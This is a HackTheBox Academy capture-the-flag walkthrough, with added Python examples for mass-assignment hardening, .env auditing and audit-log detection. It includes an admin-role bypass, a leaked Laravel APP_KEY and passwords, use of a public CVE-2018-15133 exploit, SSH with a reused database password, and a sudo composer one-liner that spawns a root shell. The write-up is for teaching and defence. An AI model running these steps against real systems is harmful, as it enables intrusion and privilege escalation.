2021-01-24

HackTheBox Academy Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • Nmap
  • Logic vulnerabilities
  • Sensitive information
  • Laravel cve-2018-15133
  • Audit log
  • Composer privilege escalation

0x03 Pentesting

Initial Enumeration

Nmap port scan

# Nmap 7.91 scan initiated Sun Jan 24 09:16:47 2021 as: nmap -sV -sC -T4 -oN nmap.txt academy.htb
Warning: 10.10.10.215 giving up on port because retransmission cap hit (6).
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.10s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
1812/tcp filtered radius
2366/tcp filtered qip-login
4004/tcp filtered pxc-roid
4662/tcp filtered edonkey
5811/tcp filtered unknown
10215/tcp filtered unknown
28201/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 24 09:18:53 2021 -- 1 IP address (1 host up) scanned in 126.11 seconds

Port 80:

During registration, changing roleid=1 in the request registers an administrator account; log in with that admin account:
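The reason a client-supplied roleid=1 works is mass assignment: the server copies every submitted field onto the new user record. The following is an added example in Python, not the box's PHP code; the in-memory db dict and the request forms are constructed, and password hashing is left out to keep the point visible.

```python
"""Mass assignment at registration: vulnerable handler beside the hardened one.
Added example, not the box's code; 'db' and the form dicts are constructed."""

ROLE_USER, ROLE_ADMIN = 0, 1
# The only fields a registration form is entitled to set.
REGISTRATION_FIELDS = {"username", "email", "password"}


def register_vulnerable(db, form):
    """Copies every submitted field onto the record: a client can add roleid=1 and become admin."""
    user = {"roleid": ROLE_USER}   # intended default ...
    user.update(form)              # ... silently overwritten if the form carries roleid
    db[user["username"]] = user    # password hashing omitted for brevity
    return user


def register_hardened(db, form):
    """Allow-list the request fields and decide the role server-side.

    Unexpected fields are rejected rather than dropped, so a tampered form shows
    up in application logs instead of failing silently.
    """
    extra = set(form) - REGISTRATION_FIELDS
    if extra:
        raise ValueError(f"unexpected registration field(s): {sorted(extra)}")
    missing = REGISTRATION_FIELDS - set(form)
    if missing:
        raise ValueError(f"missing registration field(s): {sorted(missing)}")
    user = {k: form[k] for k in REGISTRATION_FIELDS}
    user["roleid"] = ROLE_USER     # never taken from the client
    db[user["username"]] = user    # password hashing omitted for brevity
    return user


# Constructed requests: a normal sign-up, and the same form with roleid=1 appended.
NORMAL_FORM = {"username": "alice", "email": "alice@example.test", "password": "hunter2"}
TAMPERED_FORM = dict(NORMAL_FORM, username="eve", roleid=ROLE_ADMIN)


if __name__ == "__main__":
    print(register_vulnerable({}, TAMPERED_FORM)["roleid"])   # 1: the tampered form made an admin
    try:
        register_hardened({}, TAMPERED_FORM)
    except ValueError as e:
        print("rejected:", e)
```

In Laravel the equivalent controls are Eloquent's `$fillable`/`$guarded` on the model and taking input through `$request->only([...])` or `$request->validated()`, so that a field like roleid never reaches `User::create()`.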

It reveals a hostname, dev-staging-01.academy.htb; add it to /etc/hosts and open it in the browser:

A Laravel error page is displayed, and it leaks some sensitive configuration:

APP_NAME "Laravel"
APP_ENV "local"
APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG "true"
APP_URL "http://localhost"
LOG_CHANNEL "stack"
DB_CONNECTION "mysql"
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
BROADCAST_DRIVER "log"
CACHE_DRIVER "file"
SESSION_DRIVER "file"
SESSION_LIFETIME "120"
QUEUE_DRIVER "sync"
REDIS_HOST "127.0.0.1"
REDIS_PASSWORD "null"
REDIS_PORT "6379"
MAIL_DRIVER "smtp"
MAIL_HOST "smtp.mailtrap.io"
MAIL_PORT "2525"
MAIL_USERNAME "null"
MAIL_PASSWORD "null"
MAIL_ENCRYPTION "null"
PUSHER_APP_ID ""
PUSHER_APP_KEY ""
PUSHER_APP_SECRET ""
PUSHER_APP_CLUSTER "mt1"
MIX_PUSHER_APP_KEY ""
MIX_PUSHER_APP_CLUSTER "mt1"
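What makes this dump dangerous is APP_DEBUG=true on a reachable host: Laravel's debug error page prints the whole environment, and a leaked APP_KEY is exactly what CVE-2018-15133 needs. The following added example (mine, not the post's or Laravel's code) parses a .env file and reports the settings that turn a stack trace into a credential leak; SAMPLE_ENV is constructed from the values shown above, rewritten in .env syntax.

```python
"""Audit a Laravel-style .env file for settings that expose or weaken secrets.
Added example, not from the original post; SAMPLE_ENV is constructed."""
import re

SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=true
APP_URL=http://localhost
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_USERNAME=homestead
DB_PASSWORD="secret"
REDIS_PASSWORD=null
MAIL_PASSWORD=null
"""

# Values that ship with the Laravel/Homestead skeleton or are obvious placeholders.
PLACEHOLDER_SECRETS = {"secret", "password", "homestead", "changeme", ""}
# Key suffixes whose values are credentials.
SECRET_SUFFIXES = ("_PASSWORD", "_SECRET", "_KEY")

_KV = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")


def parse_env(text):
    """Parse KEY=value lines (dotenv style): comments and blank lines skipped, quotes stripped."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _KV.match(line)
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if len(val) >= 2 and val[0] == val[-1] and val[0] in "\"'":
            val = val[1:-1]                            # quoted: literal value
        elif " #" in val:
            val = val.split(" #", 1)[0].rstrip()       # unquoted: drop trailing comment
        env[key] = val
    return env


def audit_env(env):
    """Return (severity, key, message) findings, most severe first."""
    findings = []
    if env.get("APP_DEBUG", "false").lower() in ("true", "1"):
        findings.append(("high", "APP_DEBUG",
                         "debug mode on: the error page dumps the whole environment, so every "
                         "secret here, APP_KEY included, must be treated as exposed and rotated"))
    if not env.get("APP_KEY"):
        findings.append(("high", "APP_KEY", "empty APP_KEY: cookies and sessions are not keyed"))
    for key, val in env.items():
        if key == "APP_KEY" or not key.endswith(SECRET_SUFFIXES):
            continue
        if val.lower() in PLACEHOLDER_SECRETS:
            findings.append(("medium", key, f"placeholder credential {val!r}"))
        elif val.lower() == "null":
            findings.append(("low", key, "no credential configured (null)"))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f[0]])


if __name__ == "__main__":
    for severity, key, msg in audit_env(parse_env(SAMPLE_ENV)):
        print(f"[{severity}] {key}: {msg}")
```

Run it against the real `.env` of a deployment as a pre-release check; on this box it would have flagged APP_DEBUG and the skeleton DB password before the staging host ever served an error page.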

Google "laravel exploit":

Use the first tool in the results: https://github.com/aljavier/exploit_laravel_cve-2018-15133

This gives a shell as the www-data user:

Getting User Access

Upload the privilege-escalation enumeration script linpeas.sh; it finds the DB password:

/var/www/html/academy/.env.example:DB_PASSWORD=secret
/var/www/html/academy/.env.example:MAIL_PASSWORD=null
/var/www/html/academy/.env.example:REDIS_PASSWORD=null
/var/www/html/academy/.env:DB_PASSWORD=mySup3rP4s5w0rd!! #interesting
/var/www/html/academy/.env:MAIL_PASSWORD=null
/var/www/html/academy/.env:REDIS_PASSWORD=null

Use this DB password to SSH in as cry0l1t3:

ssh [email protected]
mySup3rP4s5w0rd!!

Grab user.txt.

Getting Root Access

After fiddling around for a long time, I watched a YouTube video and realized this is quite similar to the Doctor box; start from the logs:

cat /var/log/audit/audit* | grep 'comm="sudo"'

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
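The grep for comm="sudo" above is the starting point; the same audit log is also where a defender can catch the composer trick, because auditd records the full argv of every sudo execve. The following added example (mine, not the post's or auditd's code) parses audit records structurally, decodes the hex-encoded PROCTITLE field, and flags sudo runs of tools whose subcommands execute project-defined scripts. The two log events are constructed: timestamps, pids and the auid 1002 are made up, and event 4002 mirrors the composer command shown above.

```python
"""Flag 'sudo <script-runner> run-script' in a Linux audit log.
Added example, not from the original post; SAMPLE_AUDIT_LOG is constructed."""
import re
from collections import defaultdict

# Constructed sample: event 4001 is an ordinary sudo use, event 4002 the composer escalation.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1611479700.101:4001): arch=c000003e syscall=59 success=yes exit=0 ppid=2100 pid=2101 auid=1002 uid=1002 euid=0 tty=pts0 ses=7 comm="sudo" exe="/usr/bin/sudo" key=(null)
type=EXECVE msg=audit(1611479700.101:4001): argc=3 a0="sudo" a1="ls" a2="/root"
type=SYSCALL msg=audit(1611479723.555:4002): arch=c000003e syscall=59 success=yes exit=0 ppid=2100 pid=2140 auid=1002 uid=1002 euid=0 tty=pts0 ses=7 comm="sudo" exe="/usr/bin/sudo" key=(null)
type=EXECVE msg=audit(1611479723.555:4002): argc=5 a0="sudo" a1="composer" a2="--working-dir=/tmp/x" a3="run-script" a4="x"
type=PROCTITLE msg=audit(1611479723.555:4002): proctitle=7375646F00636F6D706F736572002D2D776F726B696E672D6469723D2F746D702F780072756E2D7363726970740078
"""

# Tools that, under sudo, execute scripts taken from a user-writable project file.
SCRIPT_RUNNERS = {"composer": {"run-script", "run"}}

_MSG = re.compile(r"msg=audit\(([\d.]+):(\d+)\)")
_TOKEN = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def decode_hex(val):
    """auditd hex-encodes values with special characters (and always PROCTITLE)."""
    if re.fullmatch(r"[0-9A-Fa-f]+", val) and len(val) % 2 == 0:
        return bytes.fromhex(val).decode("utf-8", "replace")
    return val


def parse_record(line):
    """One audit line -> dict of fields plus 'event_id' and 'time'; None if not an audit record."""
    m = _MSG.search(line)
    if not m:
        return None
    rec = {"time": float(m.group(1)), "event_id": int(m.group(2))}
    for key, val in _TOKEN.findall(line):
        if key == "msg":
            continue
        if val.startswith('"') and val.endswith('"'):
            val = val[1:-1]
        elif key == "proctitle" or (re.fullmatch(r"a\d+", key) and rec.get("type") == "EXECVE"):
            val = decode_hex(val)
        rec[key] = val
    return rec


def parse_log(text):
    """Group records by event id: {event_id: {record_type: fields}}."""
    events = defaultdict(dict)
    for line in text.splitlines():
        rec = parse_record(line)
        if rec:
            events[rec["event_id"]][rec["type"]] = rec
    return events


def execve_argv(event):
    ex = event.get("EXECVE")
    if not ex:
        return []
    return [ex[f"a{i}"] for i in range(int(ex.get("argc", 0))) if f"a{i}" in ex]


def sudo_events(events):
    """The page's grep comm="sudo", done on parsed records."""
    return {eid: ev for eid, ev in events.items() if ev.get("SYSCALL", {}).get("comm") == "sudo"}


def flag_sudo_script_runners(events):
    """sudo invocations whose target is a script runner with a script-executing subcommand."""
    hits = []
    for eid, ev in sudo_events(events).items():
        argv = execve_argv(ev)
        # Drop 'sudo' itself and dash options; sudo options that take a value are not handled here.
        args = [a for a in argv[1:] if not a.startswith("-")]
        if args and args[0] in SCRIPT_RUNNERS and any(a in SCRIPT_RUNNERS[args[0]] for a in args[1:]):
            hits.append({"event_id": eid, "auid": ev["SYSCALL"].get("auid"), "argv": argv})
    return hits


if __name__ == "__main__":
    for hit in flag_sudo_script_runners(parse_log(SAMPLE_AUDIT_LOG)):
        print(f"event {hit['event_id']} auid={hit['auid']}: {' '.join(hit['argv'])}")
```

The detection only fires when execve auditing is on (an `-a always,exit -F arch=b64 -S execve` rule, or `-F comm=sudo`); the fix on the host side is the sudoers entry itself, since a sudo rule for composer is equivalent to a root shell for whoever holds it.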

Copyright © ca01h 2019-2021